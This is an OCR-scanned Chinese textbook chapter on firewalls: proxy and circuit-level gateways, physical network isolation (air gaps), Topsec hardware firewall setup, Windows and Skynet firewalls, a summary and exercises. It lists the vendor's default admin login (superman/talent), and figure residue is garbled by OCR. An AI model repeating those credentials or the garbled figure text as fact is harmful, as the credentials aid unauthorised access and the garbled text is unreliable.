(2) 代理 对 用 户 不 透明 ,客户 端 需 安装 特殊 的 软件 。 

(3) 对 于 每 项 服务 代理 可 能 要 求 不 同 的 服务 器 ,升级 维护 复杂 。 

(4) 代理 服务 不 能 保证 免 受 所 有 协议 弱点 的 限制 。 

(5) 代理 技术 有 限 ,不 能 改进 底层 协议 的 安全 性 。 

(6) 应 用 层 代 理 对 操作 系统 和 应 用 层 的 漏洞 也 是 脆弱 的 。 

2. 电路 级 代理 

应 用 层 代 理 为 一 种 特定 的 服务 (如 FTP、Telnet 等 ) 提 供 代理 服务 , 它 不 但 转发 流量 ,而 
且 对 应 用 层 协议 做 出 解释 。 电 路 级 代理 (通常 也 称 为 电路 级 网 关 ) 也 是 一 种 代理 ,但 只 是 建 
立 起 一 个 回路 ,对 数据 包 只 起 转发 的 作用 。 电 路 级 网 关 依赖 于 TCP 连接 ,并 不 进行 任何 附 
加 的 包 处 理 或 过 滤 。 

如 图 10. 21 所 示 ,电路 级 网 关 只 用 来 在 两 个 通信 终点 之 间 转 接 数据 包 , 只 是 将 简单 的 字 
节 来 回复 制 ,由 于 连接 似乎 是 起 源 于 防火 墙 ,其 隐藏 了 受 保护 网 络 的 有 关 信息 。 电 路 级 网 关 
对 外 像 一 个 代理 ,而 对 内 则 是 一 个 过 滤 路 由 器 , 仅 传输 TCP 的 数据 段 ,增强 的 电路 级 网 关 还 


具有 认证 作用 。 
电路 级 
TCP 端 口 TCP 端 口 
是 传输 层 


网 络 层 


数据 链 路 /物理 层 


计算 机 服务 器 
图 10.21 电路 级 网 关 工作 原理 


电路 级 代理 的 特点 是 : 在 电路 级 网 关中 ,数据 包 被 提交 给 应 用 层 来 处 理 ; 适 用 于 多 个 协 
议 , 但 不 能 解释 应 用 协议 ,只 对 数据 包 进行 转发 。 


10.4 ”物理 隔离 技术 一 一 网 闸 


物理 隔离 器 是 一 种 不 同 网 络 间 的 隔离 部 件 , 通 过 物理 隔离 的 方式 使 两 个 网 络 在 物理 连 
线 上 完全 隔离 , 且 没有 任何 公用 的 存储 信息 ,保证 计算 机 的 数据 在 网 际 间 不 被 重用 。 一 般 采 
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用 电源 切换 的 手段 ,使 得 所 隔离 的 区 域 始终 处 在 互 不 同时 通电 的 状态 下 (对 硬盘 、 软 驱 、 光 
驱 , 也 可 通过 在 物理 上 控制 IDE 线 实 现 )。 被 隔离 的 两 端 永远 无 法 通过 隔离 部 件 交换 信息 。 

逻辑 隔离 器 也 是 一 种 不 同 网 络 间 的 隔离 部 件 ,被 隔离 的 两 端 仍然 存在 物理 上 数据 通道 
连 线 ,但 通过 技术 手段 保证 被 隔离 的 两 端 没有 数据 通道 , 即 逻 辑 上 隔离 。 一 般 使 用 协议 转 
换 、 数 据 格式 剥离 和 数据 流 控制 的 方法 ,在 两 个 逻辑 隔离 区 域 中 传输 数据 。 并 且 传 输 的 方向 
是 可 控 状 态 下 的 单 向 ,不 能 在 两 个 网 络 之 间 直 接 进 行 数据 交换 。 

网 闸 (Gap) 是 一 种 物理 隔离 设备 ,最 早 提出 物理 隔离 技术 的 是 以 色 列 和 美国 的 军 方 , 主 
要 用 以 解决 涉 密 网 络 与 公共 网 络 连接 时 的 安全 。 

隔离 的 内 容 包括 网 络 隔离 和 数据 隔离 。 数 据 隔离 主要 是 指 存储 设备 的 隔离 , 即 一 个 存 
储 设备 不 能 被 几 个 网 络 共享 。 网 络 隔离 就 是 把 被 保护 的 网 络 从 公开 的 、 无 边界 的 .自由 的 环 
境 中 独立 出 来 。 


10.4.1 物理 隔离 部 件 


物理 隔离 部 件 一 般 包 括 隔离 卡 、 隔 离 集 线 器 和 隔离 单 主板 等 。 客 户 端 物理 隔离 一 般 采 
用 隔离 卡 ,使 一 台 计算 机 既 连 接 内 网 又 连接 外 网 ,在 两 个 网 上 分 时 地 工作 ,在 保证 内 外 网 络 
隔离 的 同时 ,资源 节省 .工作 方便 。 

集线器 物理 隔离 作为 连接 切换 器 常 与 客户 端的 物理 隔离 相 结合 ,而 客户 端 使 用 一 条 网 
线 由 远 端 切换 器 连接 双 网 ,实现 一 台 工 作 站 连接 两 个 网 络 的 目的 。 

服务 器 端 物 理 隔离 一 般 采 用 复杂 的 软 硬 件 技术 ,实现 在 服务 器 端的 数据 过 滤 和 传输 ,使 
内 外 网 之 间 同 一 时 刻 没有 连 线 ,能 快速 ,分 时 地 传递 数据 。 

1. 网 络 隔离 卡 

如 图 10. 22 所 示 ,硬件 插 卡 可 以 在 物理 上 将 计算 机 划分 成 两 个 独立 的 部 分 ,每 一 部 分 都 
有 自己 的 “虚拟 ”硬盘 。 网 络 安全 隔离 卡 设置 在 PC 最 低层 的 物理 部 件 上 , 卡 的 一 边 通过 
IDE 总 线 连 接 主板 , 另 一 边 连 接 IDE 硬盘 。PC 的 硬盘 被 分 割 成 安全 区 和 公共 区 两 个 物理 
区 ,安全 区 只 与 内 部 网 络 连接 ,公共 区 只 与 外 部 网 络 连接 。 两 个 区 各 有 自己 独立 的 操作 系 
统 , 并 分 别 导 入 ,保证 两 个 硬盘 不 会 同时 被 激活 。 两 个 分 区 不 可 以 直接 交换 数据 ,但 是 可 以 
通过 专门 设置 的 中 间 功 能 区 进行 ,或 通过 安全 通道 使 数据 由 公共 区 向 安全 区 转移 (不 可 


逆向 ) 。 

内 部 网 络 
° 安全 区 
< o 一 公共 区 

络 安全 隔离 
人 连接 外 部 网 络 
图 10.22 网 络 隔离 卡 
隔离 卡 的 隔离 步 又 如 下 : 


(1) 转换 规则 。 
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(2) 先 关闭 当前 操作 系统 。 

(3) 转换 硬盘 连接 。 

(4) 转换 隔离 开关 连接 目标 网 络 。 

(5) 启动 目标 系统 。 

2. 隔离 集线器 

隔离 集线器 是 一 种 多 路 开关 切换 设备 ,如 图 10. 23 所 示 ,与 网 络 安全 隔离 卡 配合 使 用 ， 
并 通过 对 网 络 安全 隔离 卡 上 发 出 的 特殊 信号 的 检测 ,识别 出 所 连接 的 计算 机 ,自动 将 其 网 线 
切换 到 相应 网 络 的 Hub 上 ,实现 计算 机 与 内 、 外 两 个 网 络 的 安全 连接 与 自动 切换 。 


而 隔离 集线器 


, 网 络 安全 


外 部 Hub [ 控制 信号 


图 10.23 隔离 集线器 


3. 单 主板 隔离 

核心 是 双 硬 盘 技术 , 它 将 内 外 网 转换 功能 做 入 BIOS 中 ,并 将 插 槽 也 分 为 内 网 和 外 网 。 
BIOS 提供 信息 发 送 和 输出 设备 的 控制 ,并 在 PC 主板 上 形成 两 个 各 自 独 立 的 由 网 卡 和 硬盘 
构成 的 网 络 接 和 人 和 信息 存储 环境 ,并 只 能 在 相应 的 网 络 环境 下 才能 各 自 独立 工作 。 对 软驱 、 
光驱 提供 功能 限制 ,在 系统 引导 时 不 允许 驱动 器 中 有 移动 存储 介质 。 双 网 计算 机 提供 软驱 
关闭 /禁用 控制 ,提供 双 端 口 设备 (打印 机 接口 /并 行 接口 、 串 行 接口 .USB 接口 和 MIDI 接 
口 等 ) 限 制 。 对 于 BIOS 则 由 防 写 跳 线 防止 病毒 ,非法 刷新 和 破坏 等 。 


10.4.2 物理 隔离 部 件 的 功能 与 特点 


物理 隔离 部 件 的 连接 如 图 10. 24 所 示 , 其 功能 要 求 如 下 : 

(1) 阻 断 网 络 的 直接 连接 , 即 没 有 两 个 网 络 同时 连 在 隔离 设备 上 。 

(2) 阻 断 网 络 的 Internet 逻辑 连接 , 即 TCP/IP 的 协议 必须 被 剥离 ,将 原始 数据 通过 
P2P 的 非 TCP/IP 连接 协议 透 过 隔离 设备 传递 。 

(3) 隔离 设备 的 传输 机 制 具有 不 可 编程 的 特性 ,因此 不 具有 感染 的 特性 。 

(4) 任何 数据 都 是 通过 两 级 移动 代理 的 方式 来 完成 ,两 级 移动 代理 之 间 是 物理 隔离 的 。 

(5) 隔离 设备 具有 审查 的 功能 。 

(6) 隔离 设备 传输 的 原始 数据 不 具有 攻击 或 对 网 络 安全 有 害 的 特性 。 

(7) 强大 的 管理 和 控制 功能 。 

物理 隔离 部 件 的 特点 : 

(1) 网 络 开 关 。 两 个 网 络 间 连 接 的 开关 。 

(2) 实时 交换 。 数 据 从 一 个 系统 通过 隔离 部 件 交换 到 另 一 个 系统 或 网 络 。 


ee 
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外 网 t 专 网 外 网 t 内 网 


物理 隔 单 向 隔 

离 部 件 t 离 部 件 t 
公 专 公 || 交 || 专 
网 网 网 || 换 || 网 
存 存 存 || 存 || 存 
设 设 设 || 设 
备 备 备 || 备 

计算 机 计算 机 


图 10. 24 用 物理 隔离 部 件 连接 和 用 单 向 隔离 部 件 连接 

(3) 单 向 连接 。 数 据 向 一 个 方向 移动 ,一 般 指 从 高 安全 性 的 网 络 向 安全 性 低 的 网 络 
移动 。 
10.4.3 物理 隔离 应 用 系统 


物理 隔离 的 应 用 示例 如 图 10. 25 和 图 10. 26 所 示 。 
内 网 服务 器 工作 站 打印 机 


工作 站 工作 站 
“I 


图 10.25 单 内 网 隔离 


连接 到 安全 的 局 域 网 
需要 有 密码 


打印 机 


10. 26 ”远程 隔离 


一 全 4 
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10.5 防火 墙 的 配置 与 管理 


10.5.1 硬件 防火 墙 的 配置 与 管理 


1. 接口 和 区 域 

接口 和 区 域 是 硬件 防火 墙 的 两 个 重要 概念 。 接 口 和 硬件 防火 墙 的 物理 端口 一 一 对 应 ， 
如 Eth0 Ethl 等 。 区 域 可 以 看 作 是 一 段 具有 相似 安全 属性 的 网 络 空 间 。 在 区 域 的 划分 上 ， 
硬件 防火 墙 的 区 域 和 接口 并 不 是 一 一 对 应 的 ,也 就 是 说 一 个 区 域 可 以 包括 多 个 接口 。 在 安 
装 硬件 防火 墙 前 ,首先 要 对 整个 受 控 网 络 进行 分 析 , 并 根据 网 络 设备 ,如 主机 、 服 务 器 等 所 需 
要 的 安全 保护 等 级 来 划分 区 域 。 

2. 通信 模式 

硬件 防火 墙 一 般 提供 透明 、 路 由 和 综合 三 种 通信 模式 ,如 图 10. 27 所 示 。 采 用 何 种 通信 
方式 是 由 用 户 的 网 络 环境 决定 的 ,用 户 需要 根据 自己 的 网 络 情况 ,合理 地 确定 防火 墙 的 通信 
模式 ;并 且 防 火 墙 采用 何 种 通信 方式 都 不 会 影响 防火 墙 的 访问 控制 功能 。 

两 接口 在 不 同 网 段 ， 
202.11.22.1/24 网 段 防火 境 处 于 路 由 模式 192.168.7.0/24 网 段 


' 
| | 

| | 

| 1 

| < SO ! ETH0:202.11.22.2 ETNL192.4687100 ! 

| | 1 

| | | 

| | 

| 1 

| 1 

| 1 


1 两 接口 在 不 同 网 段 ， 
防火 墙 处 于 路 由 模式 


两 接口 在 同一 网 段 ， 


人 


1 上 

| | 

1 | 

! | 

| 1 透明 路 由 模式 ， 称 为 

' 1 综合 模式 或 者 混合 模式 
! | 


192.168.7.0/24 网 段 
图 10.27 防火 墙 的 通信 模式 


(1) 透明 模式 (提供 桥接 功能 )。 在 这 种 模式 下 ,硬件 防火 墙 的 所 有 接口 均 作 为 交换 接 
口 工作 。 也 就 是 说 ,对 于 同一 网 段 的 数据 包 在 转发 时 不 作 任何 改动 ,包括 IP 和 MAC 地 址 ， 
直接 把 包 转 发 出 去 。 

(2) 路 由 模式 (路 由 功能 )。 在 这 种 模式 的 硬件 防火 墙 类 似 于 一 台 路 由 器 ,转发 数据 包 
时 将 接收 到 的 数据 包 的 源 MAC 地 址 蔡 换 为 相应 接口 的 MAC 地 址 。 该 模式 适用 于 每 个 区 
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域 都 不 在 同一 个 网 段 的 情况 。 

(3) 综合 模式 (透明 十 路 由 功能 )。 前 两 种 模式 的 混合 , 某 些 区 域 (接口 ) 工 作 在 透明 模 
式 下 ,而 其 他 的 区 域 (接口 ) 工 作 在 路 由 模式 下 ,适用 于 较 复杂 的 网 络 环境 。 

3. 连接 安装 

如 图 10. 28 所 示 ,防火 墙 连接 安装 前 必须 明确 的 几 个 问题 : 

(1) 路 由 走向 (包括 防火 墙 及 其 相关 设备 的 路 由 调整 ) ,确定 防火 墙 的 工作 模式 (路 由 、 
透明 综合) 。 

(2) IP 地 址 的 分 配 (包括 防火 墙 及 其 相关 设备 的 IP 地 址 分 配 )。 根 据 确定 好 的 防火 墙 
的 工作 模式 给 防火 墙 分 配合 理 的 IP 地 址 。 

(3) 数据 应 用 和 数据 流向 (各 种 应 用 的 数据 流向 及 其 需要 开放 的 端口 号 或 者 协议 类 型 )。 

(4) 要 达到 的 安全 目的 ( 即 要 做 什么 样 的 访问 控制 ) 。 

(5) 产品 提供 的 附件 及 线 缆 使 用 方式 。 包 括 CONSOLE 线 缆 (RJ45 线 缆 加 DB9 口 转 
CONSOLE 接口 头 )`UTP5 双 绞 线 ( 直 通 1 条 ,白色 ,与 Hub/SWITCH 相连 ;交叉 1 条 , 红 
色 , 与 路 由 器 /主机 或 三 层 高 端 交换 机 连接 ) .软件 光盘 和 上 架 附 件 等 。 


接 COMD Switch 、Hub Router PC 
至 内 网 至 外 网 


图 10.28 天 融 信 防 火 墙 的 连接 安装 


4. 防火 墙 的 工作 状态 
硬件 防火 墙 的 硬件 设备 连接 安装 完成 之 后 ,就 可 以 上 电 了 。 在 工作 过 程 中 ,用 户 可 以 根 
据 硬件 防火 墙 面板 上 的 指示 灯 来 判断 防火 墙 的 工作 状态 ,具体 请 见 表 10. 2。 
表 10.2 防火 墙 工作 状态 
指示 灯 | 指示 灯 状 态 描述 
工作 灯 | 当 防 火 墙 进入 工作 状态 时 ,工作 灯 闪 烁 


主 从 灯亮 的 时 候 ,代表 此 墙 是 工作 墙 ;反之 ,如 果 主 从 灯 处 于 熄灭 状态 , 则 该 防火 墙 工作 在 备 
份 模式 


管理 灯 | 当 网 络 管理 员 , 如 安全 审计 管理 员 登 录 防 火 墙 时 ,管理 灯 点 亮 
日 志 灯 | 当 有 日 志 记 录 动 作 发 生 时 , 且 前 后 两 次 日 志 记录 发 生 的 时 间 间 隔 超过 1s 时 ,日 志 灯会 点 亮 


主 从 灯 


5. 防火 墙 配置 步骤 
(1) 根据 网 络 环境 考虑 防火 墙 部 署 模式 (路 由 模式 、 透 明 模 式 和 混合 模式 ) 。 


防火 墙 技术 


(2) 配置 防火 墙 接口 IP。 

(3) 配置 区 域 和 默认 访问 权限 。 

(4) 设置 路 由 表 。 

(5) 定义 对 象 。 

(6) 制定 地 址 转换 策略 (包括 源 地 址 转换 .目的 地 址 转换 、 双 向 转换 和 不 转换 ) 。 

(7) 制定 访问 控制 策略 。 

(8) 其 他 特殊 应 用 配置 。 

(9) 配置 保存 。 

(10) 配置 文件 备份 。 

注意 ,每 次 修改 配置 前 ,建议 首先 备份 防火 墙 再 修改 配置 ,避免 防火 墙 配置 不 当 造成 网 
络 中 断 。 

6. 防火 墙 配置 管理 

假如 网 络 连接 如 图 10. 29 所 示 , 以 天 融 信和 防火 墙 为 例 , 有 4 种 配置 管理 方式 : 


Ge 


111.111.111.254 


111.111.111.230 
10.1.1.1 
10.1.1.254 


172.16.1.254 Web 服 务 器 


< 


图 10.29 防火 墙 连接 配置 图 


(1) 串口 (Console) 管 理 方式 。 以 用 户 名 superman、 初 始 口 令 talent 登录 防火 墙 进行 配 
置 。 用 passwd 命令 可 修改 管理 员 密 码 。 

(2) WEBUI 管理 方式 (https 协议 )。 以 超级 管理 员 superman\ 口 令 talent 登录 配置 。 
可 在 “系统 管理 一 管理 员 ” 中 修改 密码 ,要求 密码 大 于 8 位 。 如 图 10. 30 所 示 。 

(3) TELNET 管理 方式 。 模 拟 Console 管理 方式 ,以 用 户 名 superman 口令 talent 登 
录 配 置 。 登 录 后 在 TopsecOS# 下 输入 命令 help mode chinese 可 以 看 到 命令 的 中 文 帮助 。 

(4) SSH 管理 方式 。 模 拟 Console 管理 方式 ,以 用 户 名 superman\ 口 今 talent 登录 
配置 。 

出 于 安全 性 的 考虑 ,强烈 建议 修改 初始 密码 。 通 过 TELNET、SSH 方式 管理 防火 墙 ， 
必须 首先 打开 防火 墙 的 服务 端口 ,系统 默认 打开 HTTP 方式 。 在 “系统 管理 一 配置 一 开放 
服务 ”中 选择 “启动 * 即 可 。 如 果 需 要 源 地 址 转换 为 一 段 地 址 , 则 首先 需要 创建 一 段 地 址 范 
围 , 且 该 地 址 范围 不 能 设置 排除 IP 地 址 。 
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图 10.30 防火 墙 的 WEBUI 管 理 界面 


进入 防火 墙 管理 界面 , 单 击 “ 网 络 管理 ”>“ 物 理 接口 ">“ 设 置 ”按钮 可 以 修改 每 个 接口 
的 描述 和 接口 IP 地 址 (接口 的 默认 状态 均 为 “路 由 ”模式 ) ,如 图 10. 31 所 示 。 
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站 过 是 管理 让 同 。。 器 由 1.11 Hl.230/255.255 255.0 150 局 用 wt we 斩 
口 二 名 解 六 服务 器 。。 器 由 1011.1 255.255.0 150 局 用 wt wt 全 
3 Ei 150 局 用 mt we 疹 
| 中 150 有 用 mt ee 闪 
到 150 有 用 wt wt 办 
到 150 用 wt wt 斩 
EE im 用 mt we 斩 
EE i509 让 用 mt ee 办 
下 150 有 用 wt wt 办 
及 EE 150 局 有 mt me 印 
mar 是 192 163.1 254/255 255.255 0 150 有 用 mo we 畏 


图 10.31 防火 墙 的 接口 配置 


在 “资产 管理 一 区 域 " 中 定义 防火 墙 区 域 及 默认 权限 为 “禁止 访问 ”。 


系统 默认 只 能 从 


ETH0 对 防火 墙 进行 管理 。 添 加 ETHO 接口 为 “内 网 ?区 域 ;ETHIl 接口 为 “外 网 ”区 域 。 
单 击 “ 系 统管 理 ” “配置 ”开放 服务 ”, 单 击 添加 对 防火 墙 的 管理 权限 。 单 击 “ 网 络 管 
理 ”>“ 路 由 ”>“ 静 态 路 由 ”, 添 加 静态 路 由 ,如 图 10. 32 所 示 。 单 击 “ 资 源 管理 "一 "地址 ”, 可 
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以 添加 单个 主机 对 象 地 址 范围 和 地 址 组 。 单 击 “ 资 源 管 理 ”>“ 服 务 ”>“ 自 定义 服务 ”>“ 汪 
加 ”, 可 以 添加 单个 端口 或 范围 ,单个 端口 只 填 起 始 端 口 , 添 加 自 定义 服务 (没有 使 用 某 些 服 
务 的 标准 端口 的 服务 )。 单 击 “ 资 源 管 理 ”>“ 时 间 ”, 可 以 设置 时 间 限 制 。 


: 


天 过 由 | 第 各 和 | 动 由 tsYF | 动身 ?| 乡 和 上 
部 帮 趾 由 表 


有 的 Bx 
718.16 1 25422 o000 
.01.1011.230132 0000 
Jr2 16.1.0f24 o000 
1 1114.0/24 o000 


0ooomo M1 UL 54 


图 10.32 添加 静态 路 由 


内 网 可 以 访问 互联 网 ,需要 配置 NAT 转换 。 互 联网 用 户 可 以 访问 内 部 服务 器 资源 , 配 
置 目的 地 址 转换 源 选择 “互联 网 区 域 ”目的 选择 111. 111. 111. 230( 公 有 IP) ,服务 选择 
http ,目的 转换 为 服务 器 真实 地 址 10. 1. 1. 1 ,目的 端口 转换 为 选择 http。 源 选择 源 区 域 “内 
网 区 域 ”, 目 的 选择 目的 区 域 “ 外 网 区 域 ”, 源 转换 为 Ethl 接口 ( 即 转换 为 Ethl 接口 IP 地 址 ) 
或 者 转换 111. 111. 111. 230。 

规则 配置 注意 : 

(1) 规则 列表 中 的 规则 作用 有 顺序 。 

(2) 访问 控制 列表 遵循 第 一 匹配 规则 。 

(3) 规则 的 一 致 性 和 逻辑 性 。 

配置 完成 后 ,配置 立即 生效 ,但 是 一 定 要 保存 配置 ,否则 设备 断 电 或 重新 启动 后 未 保存 
配置 将 丢失 。 保 存 的 配置 将 作为 下 次 设备 启动 配置 。 

7. 防火 墙 高 级 应 用 设置 

(1) 硬件 防火 墙 提供 比较 全 面 的 DHCP 服务 功能 。 作 为 DHCP 客户 端 , 从 DHCP 服 
务 器 获取 动态 IP 地 址 ,硬件 防火 墙 的 某 些 接口 或 全 部 接口 将 由 DHCP 服务 器 动态 分 配 IP 
地 址 ;作为 DHCP 服务 器 ,集中 管理 和 维护 客户 网 络 主机 IP 地 址 分 配 。 

(2) 基于 用 户 名 的 访问 控制 。 用 户 认 证 的 主要 目的 是 为 了 对 用 户 进行 身份 鉴别 .授权 
以 及 进行 细 粒 度 的 访问 控制 ,解决 以 往 简单 认证 方式 带 来 的 整 端 ,保证 用 户 设备 之 间 访 问 的 
安全 性 。 通 过 用 户 名 对 设备 .用户 和 管理 员 身 份 的 合法 性 进行 认证 ,防止 非法 接 和 人 用户 访 问 
关键 应 用 (如 财务 ) 。 如 本 地 认证 首先 启用 本 地 认证 服务 器 ,创建 用 户 列表 ,创建 用 户 角色 ， 
在 相应 区 域 开放 验证 服务 ,设置 认证 客户 端 并 启动 。 

(3) 绑 定 控制 。 单 击 “网 络 管理 ”>“ 二 层 网 络 ”>ARP, 在 需要 绑 定 的 地 址 后 选择 “ 定 
义 ”>“ 确 定 ” 来 绑 定 协议 。 单 击 “ 防 火 墙 ”>“IP/MAC 绑 定 ?可 以 实现 IP/MAC 绑 定 。 
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10.5.2 基于 主机 的 软件 防火 墙 配置 


1. Windows 防火 墙 

Windows 防火 墙 可 以 帮助 阻止 病毒 和 蠕虫 进入 计算 机 系统 ,询问 是 否 允 许 或 阻止 某 些 
连接 请 求 ,创建 安全 日 志 记录 成 功 或 失败 的 连接 请 求 ,用 于 故障 诊断 。Windows 防火 墙 虽 
然 不 会 主动 拦截 出 站 连接 ,但 会 阻止 和 拦截 进 站 请 求 或 回应 。 

Windows 防火 墙 用 例外 程序 列表 的 选 定 来 阻止 外 来 连接 或 响应 ,不 在 例外 列表 中 的 将 
询问 。 在 高 级 选项 中 可 以 指定 允许 访问 的 本 地 服务 。 配 置 如 图 10. 33 和 图 10. 34 所 示 。 


[FF 司 
na 


程序 和 服务 到 ) 


| 回 Winaows Nessenger 
回 Yinaows (R) Netleeting (R) 
回 文件 和 打印 机 共享 
回 远程 协助 
口 远程 点 面 


REFO 7 | [SEO | 


加 Windows 防火 墙 阻止 程序 时 通知 我 gg) 


网 党 连接 设置 
TR 


回 本 地 连接 [ET Tm | | 用 户 可 以 访问 的 运行 于 您 的 网 络 上 的 服 
回 宽带 连接 服务 
回 FTF 服务 器 
口 Internet 邮件 访问 协议 版 本 3 CMAP3) 
安全 日 志 记 录 站 Internet et 4 DA) 
Internet 
有用 于 和 的 是 ET rr ee ee 
口 Tanet 服务 器 


IO 


tt EEEEGE 


口 安全 Yeb 服务 器 QTPS) 
算 机 可 能 共享 错误 和 拟 态 口 运程 点 面 


默认 设置 
Fr ENA ’ 


[ET 
EE | 


2. 天 网 防火 墙 
天 网 防火 墙 个 人 版 是 由 广州 众 达 天 网 技术 有 限 公司 研发 制作 给 个 人 计算 机 使 用 的 网 络 
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安全 工具 ,短小 精 悍 , 只 有 4~5MB。 由 “中 国 国家 安全 部 ”“ 中 国 公安 部 ”“ 中 国 国家 保密 
局 ”及 “中 国 国家 信息 安全 测评 认证 中 心 ” 信 息 安 全 产品 最 新 检验 标准 认证 通过 。 由 于 企业 
倒闭 ,该 软件 于 2010 年 4 月 停止 更 新 。 天 网 防火 墙 个 人 版 的 应 用 程序 设置 如 图 10. 35 所 
示 ,IP 访问 规则 配置 如 图 10. 36 所 示 。 


向 | 
而 
市 
上 
让 
下 
i 
而 
上 
i 


图 10.35 应 用 程序 访问 设置 图 10.36 自 定 义 全 规则 


天 网 防火 墙 采用 优化 的 3. 0 内 核 引擎 ,优化 了 数据 检测 算法 ,使 数据 处 理 速度 更 快 , 系 
统 资源 占用 率 低 ,提供 强大 的 访问 控制 .应 用 选 通 和 信息 过 滤 等 功能 。 天 网 防火 墙 把 网 络 分 
为 本 地 网 和 互联 网 ,可 以 针对 来 自 不 同 网 络 的 信息 ,设置 不 同 的 安全 方案 , 它 适 合 于 任何 方 
式 连接 上 网 的 个 人 用 户 。 具 有 如 下 特征 : 

(1) 严密 的 实时 监控 。 对 所 有 外 部 请 求 进行 过 滤 ,拒绝 非 授权 的 访问 。 

(2) 灵活 的 安全 规则 。 可 以 只 允许 特定 主机 的 相应 服务 ,可 以 根据 实际 情况 添加 、 删 
除 、 修 改 安全 规则 ,可 以 升级 规则 库 。 默 认 IP 规则 配置 如 图 11. 35 所 示 ,修改 IP 规则 如 图 
11.36 所 示 。 

(3) 应 用 程序 规则 设置 。 可 以 进行 数据 包 底层 分 析 拦 截 ,控制 应 用 程序 发 送 和 接收 数 
据 包 的 类 型 .通信 端口 。 

(4) 详细 的 访问 记录 。 记 录 所 有 被 拦截 的 访问 ,包括 访问 的 时 间 、 来 源 、 类 型 和 代码 等 。 

(5) 完善 的 保护 措施 。 查 看 ,修改 、 关 闭 防 火 墙 的 操作 有 密码 保护 ,防火 墙 进 程 具有 系 
统 级 权限 ,保证 不 被 恶意 关闭 。 

(6) 智能 的 入 侵 检测 。 自 动 判 断 密集 的 攻击 并 将 攻击 源 加 入 列表 ,确认 该 攻击 源 。 


本 童 小 结 
隔离 就 是 在 内 部 系统 与 对 外 连接 通道 上 设置 阻塞 点 ,以 便 对 攻击 者 进行 监视 和 控制 ,有 


效 地 维持 被 保护 网 络 的 边界 安全 。 它 分 为 逻辑 隔离 (主要 指 防火 墙 ) 和 物理 隔离 (主要 指 
网 闸 ) 。 
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所 谓 防火 墙 是 指 设置 在 两 个 网 络 之 间 实 施 访 问 控制 的 一 组 部 件 集合 ,部 署 在 关键 路 径 
上 ,是 实现 网 络 和 信息 安全 的 基础 设施 ,是 不 同 网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入 口 ， 
能 根据 企业 的 安全 策略 控制 (允许 ,拒绝 、 监 测 ) 出 入 网 络 的 信息 流 , 且 本 身 具有 和 较 强 的 抗 攻 
击 能 力 。 

防火 墙 可 实现 连接 控制 ,协议 控制 和 数据 控制 。 防 火 墙 的 经 典 功能 是 阻隔 非 法 请 求 和 
跨 权限 访问 。 

防火 墙 按 产品 形态 分 为 软件 防火 墙 . 软 硬 一 体 化 防火 墙 和 硬件 防火 墙 ; 按 适用 范围 分 为 
网 络 防火 墙 和 主机 防火 墙 ; 按 应 用 技术 分 为 包 过 滤 防 火 墙 , 代 理 防 火 墙 和 复合 防火 墙 。 

防火 墙 的 基本 体系 结构 包括 屏蔽 路 由 器 、 双 宿主 机 防火 墙 .屏蔽 主机 防火 墙 .屏蔽 子 网 
防火 墙 和 其 他 的 防火 墙 结构 。 

防火 墙 技 术 是 一 种 综合 技术 ,主要 包括 包 过 滤 技 术 、 网 络 地 址 转换 技术 和 代理 技术 。 
包 过 滤 防 火 墙 (Packet Filtering) 又 叫 网 络 级 防火 墙 ,工作 在 OSI 网 络 参考 模型 的 网 络 层 
和 传输 层 , 它 根据 数据 包头 源 地 址 .目的 地 址 、 端 口号 和 协议 类 型 等 标志 确定 是 否 允 许 通 
过 。 只 有 满足 过 滤 条 件 的 数据 包 才 被 转发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 
丢弃 。 

访问 控制 列表 的 配置 有 两 种 方式 : 

(1) 默认 拒绝 。 一 切 未 被 允许 的 就 是 禁止 的 ,这 是 一 种 限制 策略 ,接受 受信 任 的 卫 包 ， 
拒绝 其 他 所 有 IP 包 。 

(2) 默认 接受 。 一 切 未 被 禁止 的 就 是 允许 的 ,这 是 一 种 宽松 策略 ,拒绝 不 受信 任 的 IP 
包 , 接 受 其 他 所 有 IP 包 。 

网 络 地 址 翻译 (NAT) 通 过 地 址 映射 保证 了 使 用 私有 IP 地 址 的 内 部 主机 或 网 络 能 够 连 
接 到 公用 网 络 。 分 为 静态 NAT ,动态 NAT 和 网 络 负载 平衡 技术 。 

代理 (Proxy) 防 火 墙 技 术 针 对 每 一 个 特定 应 用 实现 在 应 用 层 的 网 络 数 据 流 保护 功能 ， 
分 为 应 用 层 网 关 和 电路 层 网 关 。 

物理 隔离 器 是 一 种 不 同 网 络 间 的 隔离 部 件 , 通 过 物理 隔离 的 方式 使 两 个 网 络 在 物理 连 
线 上 完全 隔离 ,上 且 没有 任何 公用 的 存储 信息 ,保证 计算 机 的 数据 在 网 际 间 不 被 重用 。 网 闸 是 
一 种 物理 隔离 (Gap Technology) 设 备 。 物 理 隔 离 部 件 一 般 包 括 隔离 卡 、 隔 离 集 线 器 和 隔离 
单 主板 等 。 隔 离 的 内 容 包 括 网 络 隔离 和 数据 隔离 。 数 据 隔离 主要 是 指 存储 设备 的 隔离 ,一 
个 存储 设备 不 能 被 几 个 网 络 共享 。 网 络 隔离 就 是 把 被 保护 的 网 络 从 公开 的 、 无 边界 的 .自由 
的 环境 中 独立 出 来 。 

接口 和 区 域 是 硬件 防火 墙 的 两 个 重要 概念 。 硬 件 防火 墙 一般 提 供 透 明 .路 由 和 综合 三 
种 通信 模式 , 分 别提 供 桥 接 功能 .路 由 功能 .透明 与 路 由 功能 。 配 置 管 理 方式 有 串口 
(Console) 管 理 `.WEBUI 管理 .TELNET 管理 和 SSH 管理 4 种 。 规 则 配置 注意 : 

(1) 规则 列表 中 的 规则 作用 有 顺序 。 

(2) 访问 控制 列表 遵循 第 一 匹配 规则 。 

(3) 规则 的 一 致 性 和 逻辑 性 。 
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习 题 10 


什么 是 防火 墙 ? 古 时 候 的 防火 墙 和 目前 通常 说 的 防火 墙 有 什么 联系 和 区 别 ? 
简 述 防火 墙 的 分 类 ,并 说 明 分 组 过 滤 防 火 墙 的 基本 原理 。 

常见 防火 墙 体系 结构 有 哪些 ?比较 它们 的 优 缺点 。 

硬件 防火 墙 有 哪 几 种 工作 模式 ? 

编写 防火 墙 规则 : 禁止 除 管理 员 计 算 机 (IP 为 172. 18. 25. 110) 外 的 任何 一 台 计 算 机 
访问 某 主 机 (IP 为 172. 18. 25. 109) 的 终端 服务 (TCP 端口 为 3389) 。 

包 过 滤 防 火 墙 适合 应 用 的 场合 有 (  ) 。 

A. 机 构 是 集中 化 的 管理 

B. 网 络 主机 数 比 较 少 

